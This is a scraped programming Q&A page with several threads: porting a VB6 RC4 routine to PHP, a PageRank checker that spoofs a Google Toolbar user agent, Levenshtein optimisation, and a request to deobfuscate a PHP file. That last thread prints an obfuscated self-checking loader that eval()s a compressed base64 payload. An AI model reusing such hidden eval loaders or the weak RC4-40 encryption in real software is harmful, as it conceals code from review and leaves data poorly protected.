We Keep Coding

Convert VB6 code to PHP

I want to convert Visual Basic 6 Code to PHP Code. I am new to PHP please help me to convert my VB6 Code to PHP. So far I tried to convert this into php code when I tried the code there is an error in the "
CryptRC4 = CryptRC4 & Chr$((pvCryptXor(baS((CLng(baS(li)) + baS(lJ)) Mod 256), Asc(Mid$(sText, lIdx, 1)))));
part and also I don't know how to proceed to the sub functions. Please see the codes below. The vb code is used to encrypt strings. I want to convert it to php format.
PHP Code
<?php
function CryptRC4($sText,$sKey){
$baS = array(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,
64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,
80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,
96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,
128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,
144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,
176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,
192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,
208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,
224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,
240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255);
$baK = array(0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,
48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,
64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,
80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,
96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,
128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,
144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,
160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,
176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,
192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,
208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,
224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,
240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255);
$bytSwap = 0;
$li = 0;
$lJ = 0;
$lIdx = 0;
for( $lIdx = 0; $lIdx < 256; $lIdx++){
$baS[$lIdx] = $lIdx;
$baK[$lIdx] = ord(substr($sKey, 1 + ($lIdx % strlen($sKey)), 1));
}
for($li = 0; $li < 256; $li++){
$lJ = ($baS[$li] + $baK[$li]) % 256;
$bytSwap = $baS[$li];
$baS[$li] = $baS[$lJ];
$baS[$lJ] = $bytSwap;
}
$li = 0;
$lJ = 0;
$data_str = "";
for($lIdx = 0; $lIdx < strlen($sText); $lIdx++){
$li = ($li + 1) % 256;
$lJ = ($lJ + $baS[$li]) % 256;
$bytSwap = $baS[$li];
$baS[$li] = $baS[$lJ];
$baS[$lJ] = $bytSwap;
#echo chr((pvCryptXor($baS[(round(($baS[$li]) + $baS[$lJ])) % 256], ord(substr($sText, $lIdx, 1)))));
$data_str .= chr((pvCryptXor($baS[(round(($baS[$li]) + $baS[$lJ])) % 256], ord(substr($sText, $lIdx, 1)))));
}
echo $data_str;
}
function pvCryptXor($li, $lJ){
if($li = $lJ){
$pcx = $lJ;
}
else {
$pcx = $li Xor $lJ;
}
return $pcx;
}
unction ToHexDump($sText) {
$lIdx;
for($lIdx = 1; $lIdx < strlen($sText); $lIdx++){
$thd .= Right$("0" & Hex(Asc(Mid(sText, lIdx, 1))), 2)
echo $thd;
}
return $thd;
}
FromHexDump("events");
function FromHexDump($sText) {
$fhd = "";
for($lIdx = 0; $lIdx < strlen($sText); $lIdx++){
$fhd .= chr(CLng("&H" & Mid(sText, lIdx, 2)));
}
return $fhd;
}
?>
VB Code:
Public Function CryptRC4(sText As String, sKey As String) As String
On Error Resume Next
Dim baS(0 To 255) As Byte
Dim baK(0 To 255) As Byte
Dim bytSwap As Byte
Dim li As Long
Dim lJ As Long
Dim lIdx As Long
For lIdx = 0 To 255
baS(lIdx) = lIdx
baK(lIdx) = Asc(Mid$(sKey, 1 + (lIdx Mod Len(sKey)), 1))
Next
For li = 0 To 255
lJ = (lJ + baS(li) + baK(li)) Mod 256
bytSwap = baS(li)
baS(li) = baS(lJ)
baS(lJ) = bytSwap
Next
li = 0
lJ = 0
For lIdx = 1 To Len(sText)
li = (li + 1) Mod 256
lJ = (lJ + baS(li)) Mod 256
bytSwap = baS(li)
baS(li) = baS(lJ)
baS(lJ) = bytSwap
CryptRC4 = CryptRC4 & Chr$((pvCryptXor(baS((CLng(baS(li)) + baS(lJ)) Mod 256), Asc(Mid$(sText, lIdx, 1)))))
Next
End Function
Private Function pvCryptXor(ByVal li As Long, ByVal lJ As Long) As Long
On Error Resume Next
If li = lJ Then
pvCryptXor = lJ
Else
pvCryptXor = li Xor lJ
End If
End Function
Public Function ToHexDump(sText As String) As String
On Error Resume Next
Dim lIdx As Long
For lIdx = 1 To Len(sText)
ToHexDump = ToHexDump & Right$("0" & Hex(Asc(Mid(sText, lIdx, 1))), 2)
Next
End Function
Public Function FromHexDump(sText As String) As String
On Error Resume Next
Dim lIdx As Long
For lIdx = 1 To Len(sText) Step 2
FromHexDump = FromHexDump & Chr$(CLng("&H" & Mid(sText, lIdx, 2)))
Next
End Function

I revised your updated code and it seems you only had a few minor errors in it, look and my changes:
I guess you can use the build in PHP function hex2bin and bin2hex instead fo you own hex conversion.
function CryptRC4($sText,$sKey){
$baS = range(0, 255); // you can use range instead of your manual arrays
$baK = range(0, 255);
$bytSwap = 0;
$li = 0;
$lJ = 0;
$lIdx = 0;
for( $lIdx = 0; $lIdx < 256; $lIdx++){
$baS[$lIdx] = $lIdx;
$baK[$lIdx] = ord(substr($sKey, 1 + ($lIdx % strlen($sKey)), 1));
}
for($li = 0; $li < 256; $li++){
$lJ = ($baS[$li] + $baK[$li]) % 256;
$bytSwap = $baS[$li];
$baS[$li] = $baS[$lJ];
$baS[$lJ] = $bytSwap;
}
$li = 0;
$lJ = 0;
$data_str = "";
for($lIdx = 0; $lIdx < strlen($sText); $lIdx++){
$li = ($li + 1) % 256;
$lJ = ($lJ + $baS[$li]) % 256;
$bytSwap = $baS[$li];
$baS[$li] = $baS[$lJ];
$baS[$lJ] = $bytSwap;
#echo chr((pvCryptXor($baS[(round(($baS[$li]) + $baS[$lJ])) % 256], ord(substr($sText, $lIdx, 1)))));
$data_str .= chr((pvCryptXor($baS[(round(($baS[$li]) + $baS[$lJ])) % 256], ord(substr($sText, $lIdx, 1)))));
}
return $data_str; // changed from echo to return
}
function pvCryptXor($li, $lJ){
if($li == $lJ){ // you had an error here, use == to compare instead of a single =
$pcx = $lJ;
}
else {
$pcx = $li ^ $lJ; // XOR function in PHP is the ^ operator
}
return $pcx;
}
$str_hex = bin2hex("events");
$str_enc = CryptRC4($str_hex,"password");
$str_dec = hex2bin(CryptRC4($str_enc,"password"));
echo $str_hex . PHP_EOL . $str_enc . PHP_EOL . $str_dec;
OUTPUT:
6576656e7473
'�����~i��
events
So it seems to me as it's actually encoding and decoding correctly!?

It seems the original VB6 implementation of CryptRC4 function is from my answer to "VB6 encrypt text using password" question on SO.
So let me try answering your Q with this short php implementation of all public functions in the VB6 snippet:
function CryptRC4($text, $key) {
return openssl_encrypt($text, "RC4-40", $key, 1 | 2);
}
function ToHexDump($text) {
return strtoupper(bin2hex($text));
}
function FromHexDump($text) {
return hex2bin($text);
}
You can excercise these one-liners with something like this:
$text = "a message here";
$password = "password";
$encr = ToHexDump(CryptRC4($text, $password));
$decr = CryptRC4(FromHexDump($encr), $password);
echo $text . PHP_EOL . $encr . PHP_EOL . $decr;

As it's intended for passwords, you can save yourself a lot of hassle. PHP has got built in functions (version 5.5 and newer) that are designed for dealing with the hashing of passwords and for verifying hashed passwords against the password submitted by a user. Have a read through the PHP relevant PHP manual pages http://php.net/manual/en/book.password.php

Check PageRank Through XML

I've searched this website and googled alot but unfortunately didn't find any real answer so please pardon me if it doesn't makes sense.
I'm using PHP to check page rank of a given URL, but it sometimes show error due to busy google website (http://toolbarqueries.google.com) The error it shows is;
Is there any way I can check page rank through either XML or even PHP with a better solution, which doesn't show any error like that?
Please help!

I've searched and find a great solution. try this:
class GooglePageRankChecker {
// Track the instance
private static $instance;
// Constructor
function getRank($page) {
// Create the instance, if one isn't created yet
if(!isset(self::$instance)) {
self::$instance = new self();
}
// Return the result
return self::$instance->check($page);
}
// Convert string to a number
function stringToNumber($string,$check,$magic) {
$int32 = 4294967296; // 2^32
$length = strlen($string);
for ($i = 0; $i < $length; $i++) {
$check *= $magic;
//If the float is beyond the boundaries of integer (usually +/- 2.15e+9 = 2^31),
// the result of converting to integer is undefined
// refer to http://www.php.net/manual/en/language.types.integer.php
if($check >= $int32) {
$check = ($check - $int32 * (int) ($check / $int32));
//if the check less than -2^31
$check = ($check < -($int32 / 2)) ? ($check + $int32) : $check;
}
$check += ord($string{$i});
}
return $check;
}
// Create a url hash
function createHash($string) {
$check1 = $this->stringToNumber($string, 0x1505, 0x21);
$check2 = $this->stringToNumber($string, 0, 0x1003F);
$factor = 4;
$halfFactor = $factor/2;
$check1 >>= $halfFactor;
$check1 = (($check1 >> $factor) & 0x3FFFFC0 ) | ($check1 & 0x3F);
$check1 = (($check1 >> $factor) & 0x3FFC00 ) | ($check1 & 0x3FF);
$check1 = (($check1 >> $factor) & 0x3C000 ) | ($check1 & 0x3FFF);
$calc1 = (((($check1 & 0x3C0) << $factor) | ($check1 & 0x3C)) << $halfFactor ) | ($check2 & 0xF0F );
$calc2 = (((($check1 & 0xFFFFC000) << $factor) | ($check1 & 0x3C00)) << 0xA) | ($check2 & 0xF0F0000 );
return ($calc1 | $calc2);
}
// Create checksum for hash
function checkHash($hashNumber)
{
$check = 0;
$flag = 0;
$hashString = sprintf('%u', $hashNumber) ;
$length = strlen($hashString);
for ($i = $length - 1; $i >= 0; $i --) {
$r = $hashString{$i};
if(1 === ($flag % 2)) {
$r += $r;
$r = (int)($r / 10) + ($r % 10);
}
$check += $r;
$flag ++;
}
$check %= 10;
if(0 !== $check) {
$check = 10 - $check;
if(1 === ($flag % 2) ) {
if(1 === ($check % 2)) {
$check += 9;
}
$check >>= 1;
}
}
return '7'.$check.$hashString;
}
function check($page) {
// Open a socket to the toolbarqueries address, used by Google Toolbar
$socket = fsockopen("toolbarqueries.google.com", 80, $errno, $errstr, 30);
// If a connection can be established
if($socket) {
// Prep socket headers
$out = "GET /tbr?client=navclient-auto&ch=".$this->checkHash($this->createHash($page)).
"&features=Rank&q=info:".$page."&num=100&filter=0 HTTP/1.1\r\n";
$out .= "Host: toolbarqueries.google.com\r\n";
$out .= "User-Agent: Mozilla/4.0 (compatible; GoogleToolbar 2.0.114-big; Windows XP 5.1)\r\n";
$out .= "Connection: Close\r\n\r\n";
// Write settings to the socket
fwrite($socket, $out);
// When a response is received...
$result = "";
while(!feof($socket)) {
$data = fgets($socket, 128);
$pos = strpos($data, "Rank_");
if($pos !== false){
$pagerank = substr($data, $pos + 9);
$result += $pagerank;
}
}
// Close the connection
fclose($socket);
// Return the rank!
return $result;
}
}
}
Now where you want to check the PR, use this code $some_var = GooglePageRankChecker::getRank("http://khanqah-daruslam.com");
Replace URL to yours (or any custom URL)

Try SEOstats: https://github.com/eyecatchup/SEOstats
SEOstats is a powerful open source PHP library to request a bunch of
SEO relevant metrics such as detailed backlink analyses, keyword and
traffic statistics, website trends, page authority, the Google
Pagerank, the Alexa Trafficrank and much more.

Try SEOstats: https://github.com/eyecatchup/SEOstats
Thanks but I already saw this and do not want to use any heavy library. I want a light weight PHP or XML code. Thanks anyway!
Actually you don't need to use the full library. SEOstats' Google PageRank method uses a standalone class that can be used as follows:
<?php
$url = 'http://somedomain.com/';
$pr = new GTB_PageRank($url);
$rank = $pr->getPageRank();
printf("The Google Pagerank of %s is %s.", $url, $rank);
The nice thing about this class, as I think, is that it supports all existing PageRank hashing algorithms (awesome, jenkins, jenkins2 and IE) and has some advanced features built in, such as suggested Toolbar-TLD and more.
You can check it out here:
https://github.com/eyecatchup/SEOstats/blob/master/SEOstats/Services/3rdparty/GTB_PageRank.php

PHP - Optimization - Levenshtein distance with prioritization

I am trying to implement the levenshtein algorithm with a little addon. I want to prioritize values that have consecutive matching letters. I've tried implementing my own form of it using the code below:
function levenshtein_rating($string1, $string2) {
$GLOBALS['lvn_memo'] = array();
return lev($string1, 0, strlen($string1), $string2, 0, strlen($string2));
}
function lev($s1, $s1x, $s1l, $s2, $s2x, $s2l, $cons = 0) {
$key = $s1x . "," . $s1l . "," . $s2x . "," . $s2l;
if (isset($GLOBALS['lvn_memo'][$key])) return $GLOBALS['lvn_memo'][$key];
if ($s1l == 0) return $s2l;
if ($s2l == 0) return $s1l;
$cost = 0;
if ($s1[$s1x] != $s2[$s2x]) $cost = 1;
else $cons -= 0.1;
$dist = min(
(lev($s1, $s1x + 1, $s1l - 1, $s2, $s2x, $s2l, $cons) + 1),
(lev($s1, $s1x, $s1l, $s2, $s2x + 1, $s2l - 1, $cons) + 1),
(lev($s1, $s1x + 1, $s1l - 1, $s2, $s2x + 1, $s2l - 1, $cons) + $cost)
);
$GLOBALS['lvn_memo'][$key] = $dist + $cons;
return $dist + $cons;
}
You should note the $cons -= 0.1; is the part where I am adding a value to prioritize consecutive values. This formula will be checking against a large database of strings. (As high as 20,000 - 50,000) I've done a benchmark test with PHP's built in levenshtein
Message Time Change Memory
PHP N/A 9300128
End PHP 1ms 9300864
End Mine 20ms 9310736
Array
(
[0] => 3
[1] => 3
[2] => 0
)
Array
(
[0] => 2.5
[1] => 1.9
[2] => -1.5
)
Benchmark Test Code:
$string1 = "kitten";
$string2 = "sitter";
$string3 = "sitting";
$log = new Logger("PHP");
$distances = array();
$distances[] = levenshtein($string1, $string3);
$distances[] = levenshtein($string2, $string3);
$distances[] = levenshtein($string3, $string3);
$log->log("End PHP");
$distances2 = array();
$distances2[] = levenshtein_rating($string1, $string3);
$distances2[] = levenshtein_rating($string2, $string3);
$distances2[] = levenshtein_rating($string3, $string3);
$log->log("End Mine");
echo $log->status();
echo "<pre>" . print_r($distances, true) . "</pre>";
echo "<pre>" . print_r($distances2, true) . "</pre>";
I recognize that PHP's built in function will probably always be faster than mine by nature. But I am wondering if there is a way to speed mine up?
So the question: Is there a way to speed this up? My alternative here is to run levenshtein and then search through the highest X results of that and prioritize them additionally.
Based on Leigh's comment, copying PHP's built in form of Levenhstein lowered the time down to 3ms. (EDIT: Posted the version with consecutive character deductions. This may need tweaked, by appears to work.)
function levenshtein_rating($s1, $s2, $cons = 0, $cost_ins = 1, $cost_rep = 1, $cost_del = 1) {
$s1l = strlen($s1);
$s2l = strlen($s2);
if ($s1l == 0) return $s2l;
if ($s2l == 0) return $s1l;
$p1 = array();
$p2 = array();
for ($i2 = 0; $i2 <= $s2l; ++$i2) {
$p1[$i2] = $i2 * $cost_ins;
}
$cons = 0;
$cons_count = 0;
$cln = 0;
$tbl = $s1;
$lst = false;
for ($i1 = 0; $i1 < $s1l; ++$i1) {
$p2[0] = $p1[0] + $cost_del;
$srch = true;
for($i2 = 0; $i2 < $s2l; ++ $i2) {
$c0 = $p1[$i2] + (($s1[$i1] == $s2[$i2]) ? 0 : $cost_rep);
if ($srch && $s2[$i2] == $tbl[$i1]) {
$tbl[$i1] = "\0";
$srch = false;
$cln += ($cln == 0) ? 1 : $cln * 1;
}
$c1 = $p1[$i2 + 1] + $cost_del;
if ($c1 < $c0) $c0 = $c1;
$c2 = $p2[$i2] + $cost_ins;
if ($c2 < $c0) $c0 = $c2;
$p2[$i2 + 1] = $c0;
}
if (!$srch && $lst) {
$cons_count += $cln;
$cln = 0;
}
$lst = $srch;
$tmp = $p1;
$p1 = $p2;
$p2 = $tmp;
}
$cons_count += $cln;
$cons = -1 * ($cons_count * 0.1);
return $p1[$s2l] + $cons;
}

I think the major slowdown in your function is the fact that it's recursive.
As I've said in my comments, PHP function calls are notoriously heavy work for the engine.
PHP itself implements levenshtein as a loop, keeping a running total of the cost incurred for inserts, replacements and deletes.
I'm sure if you converted your code to a loop as well you'd see some massive performance increases.
I don't know exactly what your code is doing, but I have ported the native C code to PHP to give you a starting point.
define('LEVENSHTEIN_MAX_LENGTH', 12);
function lev2($s1, $s2, $cost_ins = 1, $cost_rep = 1, $cost_del = 1)
{
$l1 = strlen($s1);
$l2 = strlen($s2);
if ($l1 == 0) {
return $l2 * $cost_ins;
}
if ($l2 == 0) {
return $l1 * $cost_del;
}
if (($l1 > LEVENSHTEIN_MAX_LENGTH) || ($l2 > LEVENSHTEIN_MAX_LENGTH)) {
return -1;
}
$p1 = array();
$p2 = array();
for ($i2 = 0; $i2 <= $l2; $i2++) {
$p1[$i2] = $i2 * $cost_ins;
}
for ($i1 = 0; $i1 < $l1; $i1++) {
$p2[0] = $p1[0] + $cost_del;
for ($i2 = 0; $i2 < $l2; $i2++) {
$c0 = $p1[$i2] + (($s1[$i1] == $s2[$i2]) ? 0 : $cost_rep);
$c1 = $p1[$i2 + 1] + $cost_del;
if ($c1 < $c0) {
$c0 = $c1;
}
$c2 = $p2[$i2] + $cost_ins;
if ($c2 < $c0) {
$c0 = $c2;
}
$p2[$i2 + 1] = $c0;
}
$tmp = $p1;
$p1 = $p2;
$p2 = $tmp;
}
return $p1[$l2];
}
I did a quick benchmark comparing yours, mine, and PHPs internal functions, 100,000 iterations each, time is in seconds.
float(12.954766988754)
float(2.4660499095917)
float(0.14857912063599)
Obviously it hasn't got your tweaks in it yet, but I'm sure they wont slow it down that much.
If you really need more of a speed boost, once you have worked out how to change this function, it should be easy enough to port your changes back into C, make a copy of PHPs function definitions, and implement your own native C version of your modified function.
There's lots of tutorials out there on how to make PHP extensions, so you shouldn't have that much difficulty if you decide to go down that route.
Edit:
Was looking at ways to improve it further, I noticed
$c0 = $p1[$i2] + (($s1[$i1] == $s2[$i2]) ? 0 : $cost_rep);
$c1 = $p1[$i2 + 1] + $cost_del;
if ($c1 < $c0) {
$c0 = $c1;
}
$c2 = $p2[$i2] + $cost_ins;
if ($c2 < $c0) {
$c0 = $c2;
}
Is the same as
$c0 = min(
$p1[$i2 + 1] + $cost_del,
$p1[$i2] + (($s1[$i1] == $s2[$i2]) ? 0 : $cost_rep),
$c2 = $p2[$i2] + $cost_ins
);
Which I think directly relates to the min block in your code. However, this slows down the code quite significantly. (I guess its the overhead of the extra function call)
Benchmarks with the min() block as the second timing.
float(2.484846830368)
float(3.6055288314819)
You were right about the second $cost_ins not belonging - copy/paste fail on my part.

Deobfuscating some PHP code [closed]

This question is unlikely to help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. For help making this question more broadly applicable, visit the help center.
Closed 10 years ago.
I'm trying to deobfuscate this PHP code:
<?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260);$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE335260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$T4A747C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD9DDE2E=strlen($T059EC46CFE335260);$T43D5686285035C13=__FILE__;$T43D5686285035C13=file_get_contents($T43D5686285035C13);$T6BBC58A3B5B11DC4=0;preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"),$T43D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159DC7D007D3<$T0D47BDF6FD9DDE2E;){if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87){$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26DD5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}else{$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A55--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5686285035C13=implode("",$T7C7E72B89B83E235);$T43D5686285035C13="?".">".$T43D5686285035C13;return $T43D5686285035C13;}}}}eval(TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));?>
Now by using a PHP formatter, I managed to make it display cleanly.
<?php
if (!function_exists("TC9A16C47DA8EEE87")) {
function TC9A16C47DA8EEE87($T059EC46CFE335260)
{
$T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
$TC9A16C47DA8EEE87 = 0;
$TA7FB8B0A1C0E2E9E = 0;
$T17D35BB9DF7A47E4 = 0;
$T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
$TBF14159DC7D007D3 = 3;
$T77605D5F26DD5248 = 0;
$T4A747C3263CA7A55 = 16;
$T7C7E72B89B83E235 = "";
$T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
$T43D5686285035C13 = __FILE__;
$T43D5686285035C13 = file_get_contents($T43D5686285035C13);
$T6BBC58A3B5B11DC4 = 0;
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
for (; $TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E; ) {
if (count($T6BBC58A3B5B11DC4))
exit;
if ($T4A747C3263CA7A55 == 0) {
$T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
$T65CE9F6823D588A7 += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
$T4A747C3263CA7A55 = 16;
}
if ($T65CE9F6823D588A7 & 0x8000) {
$TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
$TC9A16C47DA8EEE87 += (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
if ($TC9A16C47DA8EEE87) {
$TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T17D35BB9DF7A47E4++)
$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
$T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
} else {
$TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
$TA7FB8B0A1C0E2E9E += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
$TBF14159DC7D007D3++;
$T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
}
} else
$T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
$T65CE9F6823D588A7 <<= 1;
$T4A747C3263CA7A55--;
if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
$T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
$T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
return $T43D5686285035C13;
}
}
}
}
eval(TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));
?>
Now I want to see the base64 text inside the eval function at the end of the file. By using this tool, I get it to see something, but not accurately.
#��<div class="dere��cha mini">provee�dores v.1.0.3</�>
<h3>P</�`?ph��p PIGUI::CheckI�nc(); ?R4>Crearh 4form id="�_�" action="indexA.?op=<
